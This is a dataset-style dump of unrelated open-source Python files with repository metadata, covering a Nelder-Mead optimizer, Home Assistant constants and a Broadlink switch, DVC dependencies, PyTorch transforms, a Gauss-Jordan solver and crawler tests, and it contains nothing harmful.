resolved_footprint = alg_footprint.subs(bind_subs)
for enc_dim in encoder_dims:
graph_params = resolved_params.subs({enc_hidden_dim_symbol: enc_dim})
graph_footprint = resolved_footprint.subs({enc_hidden_dim_symbol: enc_dim})
print('{}\t{}\t{}'.format(enc_dim, graph_params, graph_footprint))
print('\nAlgorithmic minimal memory footprint by hidden dimension, params:')
full_subs = dict(bind_subs)
for enc_dim in encoder_dims:
graph_params = resolved_params.subs({enc_hidden_dim_symbol: enc_dim})
full_subs[enc_hidden_dim_symbol] = enc_dim
graph_min_foot = graph.calcMinimalFootprint(symbol_subs=full_subs)
print('{}\t{}\t{}'.format(enc_dim, graph_params, graph_min_foot))
if __name__ == "__main__":
run_tf_speech_attention()
| 65.788427
| 247
| 0.681015
|
5137e386269eb5d03ccf0fe3773cf9258124be38
| 96
|
py
|
Python
|
Python/Programming Fundamentals/Basic Syntax/01. Biggest three numbers.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
Python/Programming Fundamentals/Basic Syntax/01. Biggest three numbers.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
Python/Programming Fundamentals/Basic Syntax/01. Biggest three numbers.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
a = int(input())
b = int(input())
c = int(input())
max_num = max(a, b, c)
print(max_num)
| 13.714286
| 23
| 0.541667
|
8f5df65a696ee07dcd7bdd3ef4c72b5b9e357d3e
| 1,978
|
py
|
Python
|
homeassistant/components/media_player/const.py
|
markusxyz/core
|
d12c6dea5759f99bbea335392d8c9479776d84d5
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/media_player/const.py
|
markusxyz/core
|
d12c6dea5759f99bbea335392d8c9479776d84d5
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/media_player/const.py
|
markusxyz/core
|
d12c6dea5759f99bbea335392d8c9479776d84d5
|
[
"Apache-2.0"
] | 1
|
2020-05-14T06:22:16.000Z
|
2020-05-14T06:22:16.000Z
|
"""Proides the constants needed for component."""
ATTR_APP_ID = "app_id"
ATTR_APP_NAME = "app_name"
ATTR_INPUT_SOURCE = "source"
ATTR_INPUT_SOURCE_LIST = "source_list"
ATTR_MEDIA_ALBUM_ARTIST = "media_album_artist"
ATTR_MEDIA_ALBUM_NAME = "media_album_name"
ATTR_MEDIA_ARTIST = "media_artist"
ATTR_MEDIA_CHANNEL = "media_channel"
ATTR_MEDIA_CONTENT_ID = "media_content_id"
ATTR_MEDIA_CONTENT_TYPE = "media_content_type"
ATTR_MEDIA_DURATION = "media_duration"
ATTR_MEDIA_ENQUEUE = "enqueue"
ATTR_MEDIA_EPISODE = "media_episode"
ATTR_MEDIA_PLAYLIST = "media_playlist"
ATTR_MEDIA_POSITION = "media_position"
ATTR_MEDIA_POSITION_UPDATED_AT = "media_position_updated_at"
ATTR_MEDIA_SEASON = "media_season"
ATTR_MEDIA_SEEK_POSITION = "seek_position"
ATTR_MEDIA_SERIES_TITLE = "media_series_title"
ATTR_MEDIA_SHUFFLE = "shuffle"
ATTR_MEDIA_TITLE = "media_title"
ATTR_MEDIA_TRACK = "media_track"
ATTR_MEDIA_VOLUME_LEVEL = "volume_level"
ATTR_MEDIA_VOLUME_MUTED = "is_volume_muted"
ATTR_MEDIA_VOLUME_CHANGE = "volume_change"
ATTR_SOUND_MODE = "sound_mode"
ATTR_SOUND_MODE_LIST = "sound_mode_list"
DOMAIN = "media_player"
MEDIA_TYPE_MUSIC = "music"
MEDIA_TYPE_TVSHOW = "tvshow"
MEDIA_TYPE_MOVIE = "movie"
MEDIA_TYPE_VIDEO = "video"
MEDIA_TYPE_EPISODE = "episode"
MEDIA_TYPE_CHANNEL = "channel"
MEDIA_TYPE_PLAYLIST = "playlist"
MEDIA_TYPE_IMAGE = "image"
MEDIA_TYPE_URL = "url"
MEDIA_TYPE_GAME = "game"
MEDIA_TYPE_APP = "app"
SERVICE_CLEAR_PLAYLIST = "clear_playlist"
SERVICE_PLAY_MEDIA = "play_media"
SERVICE_SELECT_SOUND_MODE = "select_sound_mode"
SERVICE_SELECT_SOURCE = "select_source"
SUPPORT_PAUSE = 1
SUPPORT_SEEK = 2
SUPPORT_VOLUME_SET = 4
SUPPORT_VOLUME_MUTE = 8
SUPPORT_PREVIOUS_TRACK = 16
SUPPORT_NEXT_TRACK = 32
SUPPORT_TURN_ON = 128
SUPPORT_TURN_OFF = 256
SUPPORT_PLAY_MEDIA = 512
SUPPORT_VOLUME_STEP = 1024
SUPPORT_SELECT_SOURCE = 2048
SUPPORT_STOP = 4096
SUPPORT_CLEAR_PLAYLIST = 8192
SUPPORT_PLAY = 16384
SUPPORT_SHUFFLE_SET = 32768
SUPPORT_SELECT_SOUND_MODE = 65536
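# The SUPPORT_* constants are bit flags; a media player advertises its feature
# set as their bitwise OR (for example, SUPPORT_PLAY | SUPPORT_PAUSE == 16385).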
| 29.522388
| 60
| 0.827604
|
c68de737437a8b22f00d66202982159c45b625d2
| 11,917
|
py
|
Python
|
aiida_optimize/engines/_nelder_mead.py
|
greschd/aiida_optimize
|
4c7bc76e4ad7e40f6105e60f34b7a20e1ab3a122
|
[
"Apache-2.0"
] | null | null | null |
aiida_optimize/engines/_nelder_mead.py
|
greschd/aiida_optimize
|
4c7bc76e4ad7e40f6105e60f34b7a20e1ab3a122
|
[
"Apache-2.0"
] | null | null | null |
aiida_optimize/engines/_nelder_mead.py
|
greschd/aiida_optimize
|
4c7bc76e4ad7e40f6105e60f34b7a20e1ab3a122
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# ******NOTICE***************
# optimize.py module by Travis E. Oliphant
#
# You may copy and use this module as you see fit with no
# guarantee implied provided you keep this notice in all copies.
# *****END NOTICE************
#
# The additional license terms given in ADDITIONAL_TERMS.txt apply to this
# file.
# pylint: disable=invalid-name
# © 2017-2019, ETH Zurich, Institut für Theoretische Physik
# Author: Dominik Gresch <greschd@gmx.ch>
"""
Defines a Nelder-Mead optimization engine.
"""
import typing as ty
import numpy as np
import scipy.linalg as la
from decorator import decorator
from aiida import orm
from ..helpers import get_nested_result
from .base import OptimizationEngineImpl, OptimizationEngineWrapper
__all__ = ['NelderMead']
RHO = 1
CHI = 2
PSI = 0.5
SIGMA = 0.5
def update_method(next_submit=None):
"""
Decorator for methods which update the results.
"""
@decorator
def inner(func, self, outputs):
self.next_submit = next_submit
self.next_update = None
func(self, outputs)
return inner
def submit_method(next_update=None):
"""
Decorator for methods which submit new evaluations.
"""
@decorator
def inner(func, self):
self.next_submit = None
self.next_update = next_update
return func(self)
return inner
class _NelderMeadImpl(OptimizationEngineImpl):
"""
Implementation class for the Nelder-Mead optimization engine.
"""
def __init__( # pylint: disable=too-many-arguments
self,
simplex: ty.List[float],
fun_simplex: ty.Optional[ty.List[float]],
xtol: ty.Optional[float],
ftol: ty.Optional[float],
max_iter: int,
input_key: str,
result_key: str,
logger,
num_iter=0,
extra_points: ty.Optional[ty.Dict[str, ty.Tuple[float, float]]] = None,
next_submit='submit_initialize',
next_update=None,
finished=False,
exceeded_max_iters=False,
result_state=None,
):
super().__init__(logger=logger, result_state=result_state)
self.simplex = np.array(simplex)
assert len(self.simplex) == self.simplex.shape[1] + 1
self.fun_simplex: ty.Optional[np.ndarray]
if fun_simplex is None:
self.fun_simplex = None
else:
self.fun_simplex = np.array(fun_simplex)
self.xtol: float = xtol if xtol is not None else np.inf
self.ftol: float = ftol if ftol is not None else np.inf
self.max_iter = max_iter
self.num_iter = num_iter
if extra_points is None:
self.extra_points: ty.Dict[str, ty.Tuple[float, float]] = {}
else:
self.extra_points = dict(extra_points)
self.input_key = input_key
self.result_key = result_key
self.next_submit = next_submit
self.next_update = next_update
self.finished = finished
self.exceeded_max_iters = exceeded_max_iters
def _get_values(self, outputs):
return [get_nested_result(res, self.result_key).value for _, res in sorted(outputs.items())]
def _get_single_result(self, outputs):
(idx, ) = outputs.keys()
x = np.array(self._result_mapping[idx].input[self.input_key].get_attribute('list'))
f = get_nested_result(outputs[idx], self.result_key).value
return x, f
@submit_method(next_update='update_initialize')
def submit_initialize(self):
self._logger.report('Submitting initialization step.')
return [self._to_input_list(x) for x in self.simplex]
def _to_input_list(self, x):
input_list = orm.List()
input_list.extend(x)
return {self.input_key: input_list}
@update_method(next_submit='new_iter')
def update_initialize(self, outputs):
self.fun_simplex = np.array(self._get_values(outputs))
@submit_method()
def new_iter(self): # pylint: disable=missing-function-docstring
self.do_sort()
self.check_finished()
if self.finished:
self.next_update = 'finalize'
return []
self.num_iter += 1
self._logger.report(
f'Start of Nelder-Mead iteration {self.num_iter}, max number of iterations: {self.max_iter}.'
)
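        # Reflection step: with RHO = 1 this mirrors the worst vertex through
        # the centroid of the remaining vertices.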
xr = (1 + RHO) * self.xbar - RHO * self.simplex[-1]
self.next_update = 'choose_step'
return [self._to_input_list(xr)]
@update_method()
def finalize(self, outputs):
pass
@property
def xbar(self):
return np.average(self.simplex[:-1], axis=0)
def do_sort(self):
idx = np.argsort(self.fun_simplex)
self.fun_simplex = np.take(self.fun_simplex, idx, axis=0)
self.simplex = np.take(self.simplex, idx, axis=0)
def check_finished(self):
"""
Updates the 'finished' attribute.
"""
x_dist_max = np.max(la.norm(self.simplex[1:] - self.simplex[0], axis=-1))
self._logger.report(f'Maximum distance value for the simplex: {x_dist_max}')
f_diff_max = np.max(np.abs(self.fun_simplex[1:] - self.fun_simplex[0]))
self._logger.report(f'Maximum function difference: {f_diff_max}')
self.finished = (x_dist_max < self.xtol) and (f_diff_max < self.ftol)
self._logger.report(
f'End of Nelder-Mead iteration {self.num_iter}, max number of iterations: {self.max_iter}.'
)
if not self.finished:
if self.num_iter >= self.max_iter:
self._logger.report('Number of iterations exceeded the maximum. Stop.')
self.exceeded_max_iters = True
self.finished = True
@update_method()
def choose_step(self, outputs):
"""
Method which selects the next step to be performed.
"""
xr, fxr = self._get_single_result(outputs)
self.extra_points = {'xr': (xr, fxr)}
if fxr < self.fun_simplex[0]:
self.next_submit = 'submit_expansion'
else:
if fxr < self.fun_simplex[-2]:
self._update_last(xr, fxr)
self.next_submit = 'new_iter'
else:
if fxr < self.fun_simplex[-1]:
self.next_submit = 'submit_contraction'
else:
self.next_submit = 'submit_inside_contraction'
def _update_last(self, x, f):
self.simplex[-1] = x
self.fun_simplex[-1] = f
@submit_method(next_update='update_expansion')
def submit_expansion(self):
self._logger.report('Submitting expansion step.')
xe = (1 + RHO * CHI) * self.xbar - RHO * CHI * self.simplex[-1]
return [self._to_input_list(xe)]
@update_method(next_submit='new_iter')
def update_expansion(self, outputs):
"""
Retrieve the results of an expansion step.
"""
xe, fxe = self._get_single_result(outputs)
xr, fxr = self.extra_points['xr']
if fxe < fxr:
self._update_last(xe, fxe)
else:
self._update_last(xr, fxr)
@submit_method(next_update='update_contraction')
def submit_contraction(self):
self._logger.report('Submitting contraction step.')
xc = (1 + PSI * RHO) * self.xbar - PSI * RHO * self.simplex[-1]
return [self._to_input_list(xc)]
@update_method()
def update_contraction(self, outputs):
"""
Retrieve the results of a contraction step.
"""
xc, fxc = self._get_single_result(outputs)
_, fxr = self.extra_points['xr']
if fxc < fxr:
self._update_last(xc, fxc)
self.next_submit = 'new_iter'
else:
self.next_submit = 'submit_shrink'
@submit_method(next_update='update_inside_contraction')
def submit_inside_contraction(self):
self._logger.report('Submitting inside contraction step.')
xcc = ((1 - PSI) * self.xbar + PSI * self.simplex[-1])
return [self._to_input_list(xcc)]
@update_method()
def update_inside_contraction(self, outputs):
"""
Retrieve the results of an inside contraction step.
"""
xcc, fxcc = self._get_single_result(outputs)
if fxcc < self.fun_simplex[-1]:
self._update_last(xcc, fxcc)
self.next_submit = 'new_iter'
else:
self.next_submit = 'submit_shrink'
@submit_method(next_update='update_shrink')
def submit_shrink(self): # pylint: disable=missing-function-docstring
self._logger.report('Submitting shrink step.')
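        # Shrink step: pull every non-best vertex toward the best one by a
        # factor SIGMA (0.5); the submitted evaluations refill fun_simplex.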
self.simplex[1:] = self.simplex[0] + SIGMA * (self.simplex[1:] - self.simplex[0])
self.fun_simplex[1:] = np.nan
return [self._to_input_list(x) for x in self.simplex[1:]]
@update_method(next_submit='new_iter')
def update_shrink(self, outputs):
self.fun_simplex[1:] = self._get_values(outputs)
@property
def _state(self):
state_dict = {
k: v
for k, v in self.__dict__.items()
if k not in ['_result_mapping', '_logger', 'xtol', 'ftol']
}
# Hide inf values before passing on to AiiDA
state_dict['xtol'] = self.xtol if self.xtol < np.inf else None
state_dict['ftol'] = self.ftol if self.ftol < np.inf else None
return state_dict
@property
def is_finished(self):
return self.finished
@property
def is_finished_ok(self):
return self.is_finished and not self.exceeded_max_iters
def _create_inputs(self):
return getattr(self, self.next_submit)()
def _update(self, outputs):
getattr(self, self.next_update)(outputs)
@property
def result_value(self):
value = super().result_value # pylint: disable=no-member
assert value.value == self.fun_simplex[0]
return value
def _get_optimal_result(self):
"""
Return the index and optimization value of the best evaluation process.
"""
cost_values = {
k: get_nested_result(v.output, self.result_key)
for k, v in self._result_mapping.items()
}
opt_index, opt_output = min(cost_values.items(), key=lambda item: item[1].value)
opt_input = self._result_mapping[opt_index].input[self.input_key]
return (opt_index, opt_input, opt_output)
def get_engine_outputs(self):
return {'last_simplex': orm.List(list=self.simplex.tolist()).store()}
class NelderMead(OptimizationEngineWrapper):
"""
Engine to perform the Nelder-Mead (downhill simplex) method.
:param simplex: The current / initial simplex. Must be of shape (N + 1, N), where N is the dimension of the problem.
:type simplex: array
:param fun_simplex: Function values at the simplex positions.
:type fun_simplex: array
:param xtol: Tolerance for the input x.
:type xtol: float
:param ftol: Tolerance for the function value.
:type ftol: float
:param max_iter: Maximum number of iteration steps.
:type max_iter: int
:param input_key: Name of the input argument in the evaluation process.
:type input_key: str
:param result_key: Name of the output argument in the evaluation process.
:type result_key: str
"""
_IMPL_CLASS = _NelderMeadImpl
def __new__( # pylint: disable=arguments-differ,too-many-arguments
cls,
simplex,
fun_simplex=None,
xtol=1e-4,
ftol=1e-4,
max_iter=1000,
input_key='x',
result_key='result',
logger=None
):
return cls._IMPL_CLASS( # pylint: disable=no-member
simplex=simplex,
fun_simplex=fun_simplex,
xtol=xtol,
ftol=ftol,
max_iter=max_iter,
input_key=input_key,
result_key=result_key,
logger=logger
)
| 31.949062
| 120
| 0.623479
|
f7a207469cfd89f2b386f13df1c3672e7985c977
| 1,922
|
py
|
Python
|
essmc2/transforms/tensor.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 69
|
2021-11-01T11:18:13.000Z
|
2022-03-28T04:27:17.000Z
|
essmc2/transforms/tensor.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 6
|
2021-11-01T09:28:13.000Z
|
2022-02-11T09:49:58.000Z
|
essmc2/transforms/tensor.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 16
|
2021-11-11T06:26:18.000Z
|
2022-03-20T13:32:15.000Z
|
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
import numpy as np
import torch
from .registry import TRANSFORMS
def to_tensor(data):
if isinstance(data, torch.Tensor):
return data
elif isinstance(data, np.ndarray):
return torch.from_numpy(data)
elif isinstance(data, list):
return torch.tensor(data)
elif isinstance(data, int):
return torch.LongTensor([data])
elif isinstance(data, float):
return torch.FloatTensor([data])
else:
raise TypeError(f"Unsupported type {type(data)}")
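# Illustrative conversions (not part of the module itself):
#   to_tensor(np.ones(3))   -> torch.from_numpy(...), sharing memory with the array
#   to_tensor([1.0, 2.0])   -> torch.tensor([1.0, 2.0])
#   to_tensor(5)            -> torch.LongTensor([5]); to_tensor(0.5) -> torch.FloatTensor([0.5])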
@TRANSFORMS.register_class()
class ToTensor(object):
def __init__(self, keys):
self.keys = keys
def __call__(self, item):
for key in self.keys:
item[key] = to_tensor(item[key])
return item
@TRANSFORMS.register_class()
class Select(object):
def __init__(self, keys, meta_keys=()):
self.keys = keys
if not isinstance(meta_keys, (list, tuple)):
raise TypeError(f"Expected meta_keys to be list or tuple, got {type(meta_keys)}")
self.meta_keys = meta_keys
def __call__(self, item):
data = {}
for key in self.keys:
data[key] = item[key]
if "meta" in item and len(self.meta_keys) > 0:
data["meta"] = {}
for key in self.meta_keys:
data["meta"][key] = item['meta'][key]
return data
@TRANSFORMS.register_class()
class TensorToGPU(object):
def __init__(self, keys, device_id=None):
self.keys = keys
self.device_id = device_id
def __call__(self, item):
ret = {}
for key, value in item.items():
if key in self.keys and isinstance(value, torch.Tensor) and torch.cuda.is_available():
ret[key] = value.cuda(self.device_id, non_blocking=True)
else:
ret[key] = value
return ret
| 28.264706
| 98
| 0.610822
|
199ad5e8c590edc9e2410f13466eb3b903479da5
| 1,181
|
py
|
Python
|
mysite/wsgi.py
|
wipxj3/EventTicket_v2
|
236bc06c31126f528dad09f61fc0220bf7cf0d42
|
[
"MIT"
] | 2
|
2019-05-17T14:53:27.000Z
|
2021-07-26T19:47:35.000Z
|
mysite/wsgi.py
|
zurawiki/thecrimsom
|
cd185ac936fc3f2de5ebfb2ffff9af52f7a83adb
|
[
"MIT"
] | null | null | null |
mysite/wsgi.py
|
zurawiki/thecrimsom
|
cd185ac936fc3f2de5ebfb2ffff9af52f7a83adb
|
[
"MIT"
] | 1
|
2017-03-21T03:53:31.000Z
|
2017-03-21T03:53:31.000Z
|
"""
WSGI config for mysite project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mysite.settings")
import mysite.startup as startup
startup.run()
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| 38.096774
| 79
| 0.806943
|
0c404e798951b43f0454d356795ea619c516ca89
| 1,109
|
py
|
Python
|
drpexport.py
|
Johnr24/DaVinciResolve-ExportProjects
|
db0f8d38d674468722a3786cfacd9ab30cbb0057
|
[
"MIT"
] | null | null | null |
drpexport.py
|
Johnr24/DaVinciResolve-ExportProjects
|
db0f8d38d674468722a3786cfacd9ab30cbb0057
|
[
"MIT"
] | null | null | null |
drpexport.py
|
Johnr24/DaVinciResolve-ExportProjects
|
db0f8d38d674468722a3786cfacd9ab30cbb0057
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# DaVinci Resolve V16: export all projects in the current folder to DRP files.
# Copyright 2019 Igor Riđanović, www.metafide.com, www.hdhead.com -
# With tweaks for Python 3.6 John Rogers 2021
# This is the way readme.txt suggests loading the Python module; it works on my machine.
import DaVinciResolveScript as dvr_script
resolve = dvr_script.scriptapp("Resolve")
fusion = resolve.Fusion()
import os #for path functions
def export_drp(p):
projs = pm.GetProjectsInCurrentFolder()
for i in projs.values():
try:
pm.ExportProject(i, os.path.join(p, i))
except TypeError:
print('This script requires DaVinci Resolve 16.')
return None
print( 'Exported', i)
return True
if __name__ == '__main__':
# Instantiate Resolve objects
pm = resolve.GetProjectManager()
#sets database name as a new or existing folder name in path
dbn = pm.GetCurrentDatabase()
dbn2 = dbn.get('DbName')
print(dbn2)
# Set the path1 to the DRP export directory
path = ''
path1 = path + dbn2
if export_drp(path1):
print('Export completed.')
| 24.644444
| 99
| 0.713255
|
50222f02926bcad6b80fa0a1227b00b7b0ee84f1
| 1,817
|
py
|
Python
|
dvc/dependency/__init__.py
|
franekp/dvc
|
e380a4a8586da643bf4e0d2281b13aee0d5e5207
|
[
"Apache-2.0"
] | null | null | null |
dvc/dependency/__init__.py
|
franekp/dvc
|
e380a4a8586da643bf4e0d2281b13aee0d5e5207
|
[
"Apache-2.0"
] | null | null | null |
dvc/dependency/__init__.py
|
franekp/dvc
|
e380a4a8586da643bf4e0d2281b13aee0d5e5207
|
[
"Apache-2.0"
] | null | null | null |
import schema
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
from dvc.exceptions import DvcException
from dvc.config import Config
from dvc.dependency.base import DependencyBase
from dvc.dependency.s3 import DependencyS3
from dvc.dependency.gs import DependencyGS
from dvc.dependency.local import DependencyLOCAL
from dvc.dependency.hdfs import DependencyHDFS
from dvc.remote import Remote
from dvc.remote.local import RemoteLOCAL
from dvc.remote.s3 import RemoteS3
from dvc.remote.gs import RemoteGS
from dvc.remote.ssh import RemoteSSH
from dvc.remote.hdfs import RemoteHDFS
DEPS = [DependencyHDFS, DependencyS3, DependencyGS, DependencyLOCAL]
DEP_MAP = {'': DependencyLOCAL,
's3': DependencyS3,
'gs': DependencyGS,
'hdfs': DependencyHDFS,}
SCHEMA = {
DependencyBase.PARAM_PATH: str,
schema.Optional(RemoteLOCAL.PARAM_MD5): schema.Or(str, None),
schema.Optional(RemoteS3.PARAM_ETAG): schema.Or(str, None),
schema.Optional(RemoteHDFS.PARAM_CHECKSUM): schema.Or(str, None),
}
def _get(stage, p, info):
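    # 'remote://<name>/...' paths are resolved through the project config entry
    # for that remote; any other path goes to the first dependency class that
    # reports it as supported.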
parsed = urlparse(p)
if parsed.scheme == 'remote':
sect = stage.project.config._config[Config.SECTION_REMOTE_FMT.format(parsed.netloc)]
remote = Remote(stage.project, sect)
return DEP_MAP[remote.scheme](stage, p, info, remote=remote)
for d in DEPS:
if d.supported(p):
return d(stage, p, info)
raise DvcException('Dependency \'{}\' is not supported'.format(p))
def loadd_from(stage, d_list):
ret = []
for d in d_list:
p = d.pop(DependencyBase.PARAM_PATH)
ret.append(_get(stage, p, d))
return ret
def loads_from(stage, s_list):
ret = []
for s in s_list:
ret.append(_get(stage, s, {}))
return ret
| 27.953846
| 92
| 0.70721
|
45a854ebe4b3c3978029a7432ce3cbdca0ebaf99
| 1,141
|
py
|
Python
|
Gauss/MetGauss.py
|
IsoT0P0S/Metodo-GaussJordan
|
d135c68254263ff850868715455b813eda5b3596
|
[
"MIT"
] | null | null | null |
Gauss/MetGauss.py
|
IsoT0P0S/Metodo-GaussJordan
|
d135c68254263ff850868715455b813eda5b3596
|
[
"MIT"
] | null | null | null |
Gauss/MetGauss.py
|
IsoT0P0S/Metodo-GaussJordan
|
d135c68254263ff850868715455b813eda5b3596
|
[
"MIT"
] | null | null | null |
import numpy as npm
A = npm.array([[1,2],[1,4]])
B = npm.array([[3],[5]])
AB = npm.concatenate((A,B),axis=1)
AB0 = npm.copy(AB)
tamano = npm.shape(AB)
n = tamano[0]
m = tamano[1]
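# Partial pivoting: for each column, swap the row holding the largest absolute
# pivot candidate into the pivot position.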
for i in range(0,n-1,1):
columna = abs(AB[i:,i])
dondemax = npm.argmax(columna)
if (dondemax !=0):
temporal = npm.copy(AB[i,:])
AB[i,:] = AB[dondemax+i,:]
AB[dondemax+i,:] = temporal
AB1 = npm.copy(AB)
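# Forward elimination: zero out the entries below each pivot to reach an
# upper-triangular augmented matrix.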
for i in range(0,n-1,1):
pivote = AB[i,i]
adelante = i + 1
for k in range(adelante,n,1):
factor = AB[k,i]/pivote
AB[k,:] = AB[k,:] - AB[i,:]*factor
AB2 = npm.copy(AB)
ultfila = n-1
ultcolumna = m-1
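# Backward elimination (Gauss-Jordan): zero out the entries above each pivot and
# normalize the diagonal; the last column then holds the solution vector.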
for i in range(ultfila,0-1,-1):
pivote = AB[i,i]
atras = i-1
for k in range(atras,0-1,-1):
factor = AB[k,i]/pivote
AB[k,:] = AB[k,:] - AB[i,:]*factor
AB[i,:] = AB[i,:]/AB[i,i]
X = npm.copy(AB[:,ultcolumna])
X = npm.transpose([X])
print('Augmented matrix:')
print(AB0)
print('Partial pivoting by rows')
print(AB1)
print('Forward elimination')
print(AB2)
print('Backward elimination')
print(AB)
print('Solution X: ')
print(X)
| 19.016667
| 42
| 0.561788
|
0f17dff7a84f71db78c1380651775e285c6ad2b2
| 2,948
|
py
|
Python
|
debug-section/already_passing_tests.py
|
tkornuta/python-sandbox
|
00e03cd3f49ebb014611d67aad886aaff04c058f
|
[
"Apache-2.0"
] | null | null | null |
debug-section/already_passing_tests.py
|
tkornuta/python-sandbox
|
00e03cd3f49ebb014611d67aad886aaff04c058f
|
[
"Apache-2.0"
] | null | null | null |
debug-section/already_passing_tests.py
|
tkornuta/python-sandbox
|
00e03cd3f49ebb014611d67aad886aaff04c058f
|
[
"Apache-2.0"
] | 1
|
2020-07-09T05:49:02.000Z
|
2020-07-09T05:49:02.000Z
|
from __future__ import print_function
from webcrawler import WebCrawler
from loggers import *
import html_helper
import unittest
test_case_html = """
<!DOCTYPE html>
<html>
<body>
<h1>Test Case 1</h1>
<p>I am a paragraph! <a href="javascript:doThing">blah</a></p>
<p>Sometimes I am <a href="./cynical.html">overly cynical</a>, but sometimes I am
<a href="./page2.html">overly naïve.</a></p>
</body>
</html>
"""
class HtmlHelperTests(unittest.TestCase):
def test_clean_up_href(self):
self.assertEqual(
html_helper.clean_up_href("http://www.example.com/space url"),
"http://www.example.com/space%20url")
def test_absolutize_path(self):
base_path = '/base/path/'
absolutize_path = html_helper.absolutize_path
self.assertEqual(absolutize_path("/hello", base_path), "/hello")
self.assertEqual(absolutize_path("hello/what", base_path), base_path + "hello/what")
self.assertEqual(absolutize_path("./hello/what", base_path), base_path + "hello/what")
self.assertEqual(absolutize_path("../hello/what", base_path), "/base/hello/what")
self.assertEqual(absolutize_path("../../hello/what", base_path), "/hello/what")
other_base_path = "/base/path"
self.assertEqual(absolutize_path("/hello", other_base_path), "/hello")
self.assertEqual(absolutize_path("hello/what", other_base_path), "/base/hello/what")
self.assertEqual(absolutize_path("./hello/what", other_base_path), "/base/hello/what")
self.assertEqual(absolutize_path("../hello/what", other_base_path), "/hello/what")
def test_get_paths(self):
result = html_helper.get_url_strings_from_doc(test_case_html)
self.assertEqual(result, ["javascript:doThing", "./cynical.html", "./page2.html"])
class CrawlerTests(unittest.TestCase):
def test_crawling(self):
crawler = WebCrawler(100, SilentCrawlerLogger)
crawler.crawl("http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/", None, True)
self.assertIn("http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2", crawler.graph.nodes)
self.assertIn("http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-real", crawler.graph.nodes)
self.assertIn("http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-fake", crawler.graph.nodes)
self.assertEqual(crawler.graph.nodes["http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-real"].status, 'success')
self.assertEqual(crawler.graph.nodes["http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-fake"].status_code, 404)
self.assertEqual(crawler.graph.nodes["http://triplebyte.github.io/web-crawler-test-site/already-passing-tests/page2-fake"].status, 'success')
if __name__ == '__main__':
unittest.main()
| 40.944444
| 149
| 0.701493
|
4067d1e535d6543127ba794a7f89e0026e9469d2
| 10,218
|
py
|
Python
|
homeassistant/components/broadlink/switch.py
|
erogleva/core
|
994ae09f69afe772150a698953c0d7386a745de2
|
[
"Apache-2.0"
] | 6
|
2016-11-25T06:36:27.000Z
|
2021-11-16T11:20:23.000Z
|
homeassistant/components/broadlink/switch.py
|
erogleva/core
|
994ae09f69afe772150a698953c0d7386a745de2
|
[
"Apache-2.0"
] | 52
|
2020-07-14T14:12:26.000Z
|
2022-03-31T06:24:02.000Z
|
homeassistant/components/broadlink/switch.py
|
erogleva/core
|
994ae09f69afe772150a698953c0d7386a745de2
|
[
"Apache-2.0"
] | 2
|
2017-09-03T16:06:02.000Z
|
2021-01-12T15:07:52.000Z
|
"""Support for Broadlink switches."""
from abc import ABC, abstractmethod
import logging
from broadlink.exceptions import BroadlinkException
import voluptuous as vol
from homeassistant.components.switch import (
DEVICE_CLASS_OUTLET,
DEVICE_CLASS_SWITCH,
PLATFORM_SCHEMA,
SwitchEntity,
)
from homeassistant.const import (
CONF_COMMAND_OFF,
CONF_COMMAND_ON,
CONF_FRIENDLY_NAME,
CONF_HOST,
CONF_MAC,
CONF_NAME,
CONF_SWITCHES,
CONF_TIMEOUT,
CONF_TYPE,
STATE_ON,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.restore_state import RestoreEntity
from .const import DOMAIN, SWITCH_DOMAIN
from .helpers import data_packet, import_device, mac_address
_LOGGER = logging.getLogger(__name__)
CONF_SLOTS = "slots"
SWITCH_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_COMMAND_OFF): data_packet,
vol.Optional(CONF_COMMAND_ON): data_packet,
}
)
OLD_SWITCH_SCHEMA = vol.Schema(
{
vol.Optional(CONF_COMMAND_OFF): data_packet,
vol.Optional(CONF_COMMAND_ON): data_packet,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
}
)
PLATFORM_SCHEMA = vol.All(
cv.deprecated(CONF_HOST),
cv.deprecated(CONF_SLOTS),
cv.deprecated(CONF_TIMEOUT),
cv.deprecated(CONF_TYPE),
PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_MAC): mac_address,
vol.Optional(CONF_HOST): cv.string,
